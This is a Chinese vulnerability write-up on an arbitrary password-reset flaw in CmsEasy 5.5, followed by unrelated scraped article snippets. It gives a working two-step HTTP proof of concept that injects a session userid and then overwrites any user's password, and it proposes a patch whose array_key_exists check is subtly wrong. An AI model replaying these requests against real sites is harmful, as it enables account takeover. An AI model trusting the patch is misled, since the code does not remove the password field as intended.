catalog

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

攻击者通过构造特殊的HTTP包,可以直接重置任意用户(包括管理员)的密码

Relevant Link:

http://www.cmseasy.cn/patch/show_919.html

2. 漏洞触发条件

0x1: POC

. 首先利用search_action控制userid的值

http://localhost/CmsEasy_5.5/index.php?case=form&act=search&catid=8&form=my_yingpin

POST

keyword=|userid|i:;""\

. 利用edit_action修改用户密码和其它资料

http://localhost/CmsEasy_5.5/index.php?case=user&act=edit

POST

password=3e503e8736acae9b3893629da7008fc0&nickname=ali&question=ali&answer=ali&qq=&e_mail=%40test.com&tel=&address=&intro=&submit=%E6%8F%%E4%BA%A4

3. 漏洞影响范围

4. 漏洞代码分析

/lib/default/user_act.php

function edit_action()

{

    if(front::post('submit'))

    {

        unset(front::$post['groupid']);

        unset(front::$post['powerlist']);

        if(!is_email(front::$post['e_mail']))

        {

            alerterror('邮箱格式不对');

        }

        foreach (front::$post as $k => $v)

        {

            if(is_array($v) && !empty($v))

            {

                front::$post[$k] = implode(',', $v);

            }

            front::check_type(front::post($k), 'safe');

        }

        //通过取session的userid字段更新该用户资料

        $this->_user->rec_update(front::$post,'userid='.session::get('userid'));

        front::flash(lang('修改资料成功!'));

        front::redirect(url::create('user/index'));

    }

    $this->view->data=$this->view->user;

}

edit_action函数实现修改用户资料,通过取sesson中的userid字段来更改。所以攻击路径必须能控制生成session中的userid字段,控制生成session的函数位置: /lib/default/form_act.php
我们继续回溯这个漏洞

function search_action()

{

    if(front::get('keyword') &&!front::post('keyword'))

    {

        front::$post['keyword']=front::get('keyword');

    }

    front::check_type(front::post('keyword'),'safe');

    //获取POST数据中的keyword参数

    if(front::post('keyword'))

    {

        $this->view->keyword=trim(front::post('keyword'));

        if(inject_check($this->view->keyword))

        {

            exit('非法请求!');

        }

        //通过恶意检测之后,通过session保存keyword参数

        session::set('keyword',$this->view->keyword);

    }

    else

    {

        session::set('keyword',null);

        $this->view->keyword=session::get('keyword');

    }

    if(inject_check($this->view->keyword))

    {

        exit('非法请求!');

    }

    var_dump($this->view->keyword);

    $type = $this->view->type;

    $condition = "";

    if(front::post('catid'))

    {

        $condition .= "catid = '".front::post('catid')."' AND ";

    }

    $condition .= "(title like '%".$this->view->keyword."%'";

    $sets=settings::getInstance()->getrow(array('tag'=>'table-fieldset'));

    $arr = unserialize($sets['value']);

    if(is_array($arr['archive']) &&!empty($arr['archive']))

    {

        foreach ($arr['archive'] as $v)

        {

            if($v['issearch'] == '')

            {

                $condition .= " OR {$v['name']} like '%{$this->view->keyword}%'";

            }

        }

    }

    $condition .= ")";

    $order = "`listorder` desc,1 DESC";

    $limit=(($this->view->page-)*$this->pagesize).','.$this->pagesize;

    $articles=$this->archive->getrows($condition,$limit,$order);

    foreach($articles as $order=>$arc)

    {

        $articles[$order]['url']=archive::url($arc);

        $articles[$order]['catname']=category::name($arc['catid']);

        $articles[$order]['caturl']=category::url($arc['catid']);

        $articles[$order]['adddate']= sdate($arc['adddate']);

        $articles[$order]['stitle']= strip_tags($arc['title']);

    }

    $this->view->articles=$articles;

    $this->view->archives=$articles;

    $this->view->record_count=$this->archive->record_count;

}

从访问控制的角度来看,这个漏洞有两个原因导致

. session不应该由攻击者随便修改,导致keyword被注入修改,这是一个平行权限漏洞

. 修改密码的入口来自于"用户资料修改",UI界面上只提供了普通身份资料的修改,但是因此MVC框架对POST数据进行了遍历,取出所有字段并进行了数据表更新操作,导致发生了表单字段注入

5. 防御方法

将代码逻辑和UI逻辑进行统一,防止出现表单字段注入
/lib/default/user_act.php

function edit_action()

{

    if(front::post('submit'))

    {

        unset(front::$post['groupid']);

        unset(front::$post['powerlist']);

        if(!is_email(front::$post['e_mail']))

        {

        alerterror('邮箱格式不对');

        }

        /**/

        $tmp = front::$post;

        if ( array_key_exists("password", $tmp['password']) )

        {

        unset($tmp['password']);

        }

        front::$post = $tmp;

        /**/

        foreach (front::$post as $k => $v)

        {

            if(is_array($v) && !empty($v))

        {

                front::$post[$k] = implode(',', $v);

            }

            front::check_type(front::post($k), 'safe');

        }

        //通过取session的userid字段更新该用户资料

        $this->_user->rec_update(front::$post,'userid='.session::get('userid'));

        front::flash(lang('修改资料成功!'));

        front::redirect(url::create('user/index'));

    }

    $this->view->data=$this->view->user;

}

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

CMSEASY /lib/tool/front_class.php、/lib/default/user_act.php arbitrary user password reset vulnerability的更多相关文章

  1. 创建DLL、Lib以及使用DLL、Lib

    1.要在生成DLL文件的同时生成Lib文件,函数声明时前面要加__declspec(dllexport). 可在头文件中如下定义: #ifndef __MYDLL_H#define __MYDLL_H ...

  2. Singleton、MultiThread、Lib——实现单实例无锁多线程安全API

        前阵子写静态lib导出单实例多线程安全API时,出现了CRITICAL_SECTION初始化太晚的问题,之后查看了错误的资料,引导向了错误的理解,以至于今天凌晨看到另一份代码,也不多想的以为s ...

  3. .h头文件、 .lib库文件、 .dll动态链接库文件之间的关系

    转自.h头文件. .lib库文件. .dll动态链接库文件之间的关系 h头文件作用:声明函数接口 dll动态链接库作用:含有函数的可执行代码 lib库有两种: (1)静态链接库(Static Liba ...

  4. 如何在项目中引入 #include .h、.lib、 .dll、.cpp (转)

    源:http://blog.csdn.net/vippolka/article/details/8552735 在项目中引入.h..lib和dll.以及.cpp 1..h的引入 解决办法1:把  XX ...

  5. [转]静态库、动态库,dll文件、lib文件,隐式链接、显式链接

    转自:https://blog.csdn.net/dcrmg/article/details/53427181 静态链接.动态链接 静态库和动态库分别应用在静态链接方式和动态链接方式中,所谓静态链接方 ...

  6. dll、lib(动态链接库、静态链接库)的区别

    1.dll:dynamic link library: lib:static link library. 2.windows系统中,许多app并不是仅由一个完整的exe构成,而是按功能分成了若干部分, ...

  7. 静态库、动态库,dll文件、lib文件,隐式链接、显式链接浅见

    静态链接.动态链接 静态库和动态库分别应用在静态链接方式和动态链接方式中,所谓静态链接方式是指在程序执行之前完成所有的链接工作,把静态库一起打包合入,生成一个可执行的目标文件(EXE文件).所谓动态链 ...

  8. .lib .dll 区别介绍、使用(dll的两种引入方式)

    .lib .dll文件都是程序可直接引用的文件,前者就是所谓的库文件,后者是动态链接库(Dynamic Link Library)也是一个库文件.而.pdb则可以理解为符号表文件.DLL(Dynami ...

  9. 通过离线安装包解决了 from cryptography.hazmat.bindings._openssl import ffi, lib ImportError: /usr/local/python36/lib/python3.6/site-packages/cryptography-2.2.2-py3.6-linux-x86_64.egg/cryptography/hazmat/binding

    场景:内网服务器不能上外网(代理也不通!), 之前安装了PYTHON的几个安装包,但不是知道为什么无法使用PARAMIKO这个模块 在导入 from cryptography.hazmat.bindi ...

随机推荐

  1. NET Core项目定义Item Template

    NET Core项目定义Item Template 作为这个星球上最强大的IDE,Visual Studio不仅仅提供了很多原生的特性,更重要的是它是一个可定制的IDE,比如自定义Project Te ...

  2. Android — Camera聚焦流程

    原文  http://www.cnphp6.com/archives/65098 主题 Android Camera.java autoFocus()聚焦回调函数 @Override public v ...

  3. c语言 指针与地址的区别

    指针由两部分组成,指针的类型和指针的值(也就是变量的地址). 指针和地址的区别: 地址只是一堆十六进制的字符,对应着内存条的某段内存, 而指针本身有地址,指针的值也是一个地址,指针本身还有类型,这与单 ...

  4. Entity Framework6 with Oracle(可实现code first)

    Oracle 与2个月前刚提供对EF6的支持.以前只支持到EF5.EF6有很多有用的功能 值得升级.这里介绍下如何支持Oracle   一.Oracle 对.net支持的一些基础知识了解介绍. 1.早 ...

  5. InputStream复用,mark和reset

    markSupported InputStream是否支持mark,默认不支持. public boolean markSupported() { return false; } InputStrea ...

  6. Java应用程序项目的打包与发行(run.bat形式)

    参考: http://www.iteye.com/topic/57312 背景: 以前一直都是在eclipse上面创建应用程序,每次要要运行的时候都要打开eclipse, 直到有个同事叫我帮忙写一个应 ...

  7. c++ 副本构造器

    我们都知道两个指针指向同一个变量时如果一个指针被释放那么另一个就会出问题 为了说明问题我做了一个很恶心的小例子 class C { public : C(int v) { ptrInt=new int ...

  8. 如何用 fiddler 代理调试本地手机页面

    最近在做移动端的页面,但是移动端的调试很蛋疼.虽然说 90% 的功能都能用 chrome 下的模拟器来模拟解决,但是剩余的 10% 却只能在真机上调试.比如说一两个像素的误差,比如说只有真机上才能重现 ...

  9. 奇怪的Js时间计算方法,跨多个月后出现1天的误差

    在项目中要求用计算两个时间相差的天数,通俗的说就是两个时间 相减, 我的方法 先把两个时间转成相应的毫秒,相减后,再除以(1000 * 60 * 60 * 24) 就可以得到对应天数,但天数会比实际少 ...

  10. Zepto的天坑汇总

    前言 最近在做移动端开发,用的是zepto,发现他跟jquery比起来称之为天坑不足为过,但是由于项目本身原因,以及移动端速度要求的情况下,也只能继续用下去. 所以在这里做一下汇总 对img标签空sr ...